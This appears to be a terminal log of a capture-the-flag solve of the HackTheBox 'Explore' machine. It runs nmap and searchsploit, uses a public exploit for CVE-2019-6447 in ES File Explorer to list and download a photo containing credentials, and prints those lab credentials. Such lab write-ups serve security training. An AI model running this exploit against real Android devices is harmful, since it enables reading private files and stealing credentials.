┌──(kali㉿kali)-[~/Desktop/htb]└─$ sudo nmap --min-rate 10000 -p-  10.129.206.179Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-09 03:28 ESTNmap scan report for 10.129.206.179Host is up (0.43s latency).Not shown: 65531 closed tcp ports (reset)PORT      STATE    SERVICE2222/tcp  open     EtherNetIP-15555/tcp  filtered freeciv36925/tcp open     unknown42135/tcp open     unknown59777/tcp open     unknown
Nmap done: 1 IP address (1 host up) scanned in 12.35 seconds                                                                                                                                                                     ┌──(kali㉿kali)-[~/Desktop/htb]└─$ sudo nmap -sC -sT -sV -O -p2222,5555,36925,59777 10.129.206.179Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-09 03:29 ESTNmap scan report for 10.129.206.179Host is up (0.42s latency).
PORT      STATE    SERVICE VERSION2222/tcp  open     ssh     (protocol 2.0)| ssh-hostkey: |_  2048 71:90:e3:a7:c9:5d:83:66:34:88:3d:eb:b4:c7:88:fb (RSA)| fingerprint-strings: |   NULL: |_    SSH-2.0-SSH Server - Banana Studio5555/tcp  filtered freeciv36925/tcp open     unknown| fingerprint-strings: |   GetRequest: |     HTTP/1.1 412 Precondition Failed|     Date: Tue, 09 Jan 2024 08:29:28 GMT|     Content-Length: 0|   HTTPOptions: |     HTTP/1.0 501 Not Implemented|     Date: Tue, 09 Jan 2024 08:29:33 GMT|     Content-Length: 29|     Content-Type: text/plain; charset=US-ASCII|     Connection: Close|     Method not supported: OPTIONS|   Help: |     HTTP/1.0 400 Bad Request|     Date: Tue, 09 Jan 2024 08:29:52 GMT|     Content-Length: 26|     Content-Type: text/plain; charset=US-ASCII|     Connection: Close|     Invalid request line: HELP|   Kerberos: |     HTTP/1.0 400 Bad Request|     Date: Tue, 09 Jan 2024 08:29:58 GMT|     Content-Length: 41|     Content-Type: text/plain; charset=US-ASCII|     Connection: Close|     Invalid request line: |     qj?n0?k?|   RTSPRequest: |     HTTP/1.0 400 Bad Request|     Date: Tue, 09 Jan 2024 08:29:33 GMT|     Content-Length: 39|     Content-Type: text/plain; charset=US-ASCII|     Connection: Close|     valid protocol version: RTSP/1.0|   SSLSessionReq: |     HTTP/1.0 400 Bad Request|     Date: Tue, 09 Jan 2024 08:29:53 GMT|     Content-Length: 73|     Content-Type: text/plain; charset=US-ASCII|     Connection: Close|     Invalid request line: |     ?G???,???`~?|     ??{????w????<=?o?|   TLSSessionReq: |     HTTP/1.0 400 Bad Request|     Date: Tue, 09 Jan 2024 08:29:55 GMT|     Content-Length: 71|     Content-Type: text/plain; charset=US-ASCII|     Connection: Close|     Invalid request line: |     ??random1random2random3random4|   TerminalServerCookie: |     HTTP/1.0 400 Bad Request|     Date: Tue, 09 Jan 2024 08:29:55 GMT|     Content-Length: 54|     Content-Type: text/plain; charset=US-ASCII|     Connection: Close|     Invalid request line: |_    Cookie: mstshash=nmap42135/tcp open  http    ES File Explorer Name Response httpd|_http-title: Site doesn't have a title (text/html).|_http-server-header: ES Name Response ServerWarning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed portAggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Android 4.1 - 6.0 (Linux 3.4 - 3.14) (93%), Android 5.0 - 6.0.1 (Linux 3.4) (93%), Android 5.0 - 7.0 (Linux 3.4 - 3.10) (93%), Android 4.2.2 (Linux 3.4) (92%), Sony X75CH-series Android TV (Android 5.0) (91%)No exact OS matches for host (test conditions non-ideal).Network Distance: 2 hopsService Info: Device: phone59777/tcp open     http    Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older|_http-title: Site doesn't have a title (text/plain).2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============SF-Port2222-TCP:V=7.94%I=7%D=1/9%Time=659D03FB%P=x86_64-pc-linux-gnu%r(NULSF:L,24,"SSH-2.0-SSHx20Serverx20-x20Bananax20Studiorn");==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============SF-Port36925-TCP:V=7.94%I=7%D=1/9%Time=659D0401%P=x86_64-pc-linux-gnu%r(GeSF:tRequest,5C,"HTTP/1.1x20412x20Preconditionx20FailedrnDate:x20TueSF:,x2009x20Janx202024x2008:29:28x20GMTrnContent-Length:x200rnrSF:n")%r(HTTPOptions,B5,"HTTP/1.0x20501x20Notx20ImplementedrnDate:SF:x20Tue,x2009x20Janx202024x2008:29:33x20GMTrnContent-Length:x202SF:9rnContent-Type:x20text/plain;x20charset=US-ASCIIrnConnection:x2SF:0ClosernrnMethodx20notx20supported:x20OPTIONS")%r(RTSPRequest,BBSF:,"HTTP/1.0x20400x20Badx20RequestrnDate:x20Tue,x2009x20Janx202SF:024x2008:29:33x20GMTrnContent-Length:x2039rnContent-Type:x20texSF:t/plain;x20charset=US-ASCIIrnConnection:x20ClosernrnNotx20ax2SF:0validx20protocolx20version:x20x20RTSP/1.0")%r(Help,AE,"HTTP/1.0SF:x20400x20Badx20RequestrnDate:x20Tue,x2009x20Janx202024x2008:29SF::52x20GMTrnContent-Length:x2026rnContent-Type:x20text/plain;x20SF:charset=US-ASCIIrnConnection:x20ClosernrnInvalidx20requestx20lSF:ine:x20HELP")%r(SSLSessionReq,DD,"HTTP/1.0x20400x20Badx20RequestrSF:nDate:x20Tue,x2009x20Janx202024x2008:29:53x20GMTrnContent-LengSF:th:x2073rnContent-Type:x20text/plain;x20charset=US-ASCIIrnConnecSF:tion:x20ClosernrnInvalidx20requestx20line:x20x16x03Sx01SF:0Ox03?G???,???`~???{????w????<=?o?x10nSF:(x16x13")%r(TerminalServerCookie,CA,"HTTP/1.0x20400x20Badx2SF:0RequestrnDate:x20Tue,x2009x20Janx202024x2008:29:55x20GMTrnCoSF:ntent-Length:x2054rnContent-Type:x20text/plain;x20charset=US-ASCIISF:rnConnection:x20ClosernrnInvalidx20requestx20line:x20x03SF:*%?Cookie:x20mstshash=nmap")%r(TLSSessionReq,DB,"HTTP/1.0SF:x20400x20Badx20RequestrnDate:x20Tue,x2009x20Janx202024x2008:2SF:9:55x20GMTrnContent-Length:x2071rnContent-Type:x20text/plain;x2SF:0charset=US-ASCIIrnConnection:x20ClosernrnInvalidx20requestx20SF:line:x20x16x03ix01ex03x03Ux1c??random1random2random3raSF:ndom4x0c/")%r(Kerberos,BD,"HTTP/1.0x20400x20Badx20RequestSF:rnDate:x20Tue,x2009x20Janx202024x2008:29:58x20GMTrnContent-LenSF:gth:x2041rnContent-Type:x20text/plain;x20charset=US-ASCIIrnConneSF:ction:x20ClosernrnInvalidx20requestx20line:x20qj?n0?k?SF:x03x02x01x05?x03x02x01");Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed portAggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Android 4.1 - 6.0 (Linux 3.4 - 3.14) (93%), Android 5.0 - 6.0.1 (Linux 3.4) (93%), Android 5.0 - 7.0 (Linux 3.4 - 3.10) (93%), Adtran 424RG FTTH gateway (92%), Linux 3.10 (92%)No exact OS matches for host (test conditions non-ideal).Network Distance: 2 hops
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 157.29 seconds

┌──(kali㉿kali)-[~/Desktop/htb]└─$ searchsploit es file explore   ----------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title                                                                                                                     |  Path----------------------------------------------------------------------------------------------------------------------------------- ---------------------------------Dooblou WiFi File Explorer 1.13.3 - Multiple Vulnerabilities                                                                       | php/webapps/51615.txtES File Explorer 4.1.9.7.4 - Arbitrary File Read                                                                                   | android/remote/50070.pyiOS iFileExplorer Free - Directory Traversal                                                                                       | ios/remote/16278.pyMetaProducts Offline Explorer 1.x - FileSystem Disclosure                                                                          | windows/remote/20488.txtMicrosoft Internet Explorer - NCTAudioFile2.AudioFile ActiveX Remote Stack Overflow (2)                                            | windows/remote/3808.htmlMicrosoft Internet Explorer - SLayoutRun Use-After-Free (MS13-009) (Metasploit) (1)                                                | windows/remote/24495.rbMicrosoft Internet Explorer - SLayoutRun Use-After-Free (MS13-009) (Metasploit) (2)                                                | windows/remote/24538.rbMicrosoft Internet Explorer - textNode Use-After-Free (MS13-037) (Metasploit)                                                      | windows/remote/25999.rbMicrosoft Internet Explorer / MSN - ICC Profiles Crash (PoC)                                                                       | windows/dos/1110.txtMicrosoft Internet Explorer 4.x/5 / Outlook 2000 0/98 0/Express 4.x - ActiveX '.CAB' File Execution                                | windows/remote/19603.txtMicrosoft Internet Explorer 4/5 - DHTML Edit ActiveX Control File Stealing / Cross Frame Access                                    | windows/remote/19094.txtMicrosoft Internet Explorer 5 - ActiveX Object For Constructing Type Libraries For Scriptlets File Write                           | windows/remote/19468.txtMicrosoft Internet Explorer 5 / Firefox 0.8 / OmniWeb 4.x - URI Protocol Handler Arbitrary File Creation/Modification              | windows/remote/24116.txtMicrosoft Internet Explorer 5/6 - 'file://' Request Zone Bypass                                                                    | windows/remote/22575.txtMicrosoft Internet Explorer 6 - '%USERPROFILE%' File Execution                                                                     | windows/remote/22734.htmlMicrosoft Internet Explorer 6 - Local File Access                                                                                  | windows/remote/29619.htmlMicrosoft Internet Explorer 7 - Arbitrary File Rewrite (MS07-027)                                                                  | windows/remote/3892.htmlMy File Explorer 1.3.1 iOS - Multiple Web Vulnerabilities                                                                          | ios/webapps/28975.txtWebFileExplorer 3.6 - 'user' / 'pass' SQL Injection                                                                                | php/webapps/35851.txt----------------------------------------------------------------------------------------------------------------------------------- ---------------------------------Shellcodes: No Results

┌──(kali㉿kali)-[~/Desktop/htb/Explore]└─$ python3 50070.py listPics 10.129.206.179
==================================================================|    ES File Explorer Open Port Vulnerability : CVE-2019-6447    ||                Coded By : Nehal a.k.a PwnerSec                 |==================================================================
name : concept.jpgtime : 4/21/21 02:38:08 AMlocation : /storage/emulated/0/DCIM/concept.jpgsize : 135.33 KB (138,573 Bytes)
name : anc.pngtime : 4/21/21 02:37:50 AMlocation : /storage/emulated/0/DCIM/anc.pngsize : 6.24 KB (6,392 Bytes)
name : creds.jpgtime : 4/21/21 02:38:18 AMlocation : /storage/emulated/0/DCIM/creds.jpgsize : 1.14 MB (1,200,401 Bytes)
name : 224_anc.pngtime : 4/21/21 02:37:21 AMlocation : /storage/emulated/0/DCIM/224_anc.pngsize : 124.88 KB (127,876 Bytes)┌──(kali㉿kali)-[~/Desktop/htb/Explore]└─$ python3 50070.py getFile  10.129.206.179 /storage/emulated/0/DCIM/creds.jpg
#可得creds图片

kristiKr1sT!5h@Rp3xPl0r3!

:/ $ ss -tlnState       Recv-Q Send-Q Local Address:Port               Peer Address:Port              LISTEN      0      50     [::ffff:10.129.206.179]:41083                    *:*                  LISTEN      0      50           *:59777                    *:*                  LISTEN      0      50           *:2222                     *:*                  LISTEN      0      8       [::ffff:127.0.0.1]:35665                    *:*                  LISTEN      0      4            *:5555                     *:*                  LISTEN      0      10           *:42135                    *:*